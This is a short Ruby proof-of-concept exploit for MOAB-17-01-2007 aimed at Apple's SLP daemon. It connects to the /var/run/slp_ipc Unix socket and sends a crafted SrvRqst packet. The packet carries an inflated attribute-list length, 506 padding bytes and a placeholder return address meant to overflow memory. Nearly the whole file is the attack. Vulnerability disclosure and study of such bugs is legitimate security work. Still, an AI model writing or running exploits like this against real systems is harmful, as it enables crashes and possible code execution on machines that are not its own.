#!/usr/bin/ruby # (c) Copyright 2006 Lance M. Havok # Kevin Finisterre # All pwnage reserved. # # Proof of concept for MOAB-17-01-2007 # http://projects.info-pull.com/moab/MOAB-17-01-2007.html # # Originally reported to Apple by Kevin, on 08/02/2006. require 'socket' target_path = (ARGV[0] || '/var/run/slp_ipc') slp_socket = UNIXSocket.open(target_path) payload = ("\x58" * 506) payload << [0xdeadbeef].pack("V") # ...it expects a valid mem. address (ex. 0xbffff398) stream = "\x01" + # SrvRqst = 1 "\x00\x13" + # Length of remaining fields? (up to attr-list) "\x04\x00\x00\x00\x00\x00\x00" + "\x00\x02\x00\x00" + # length of scope-list string "\x78\x78" + # "\xff\x03\x00\x00" + # length of attr-list string 0x3ff = 1023 in hex. (payload) # slp_socket.write stream slp_socket.close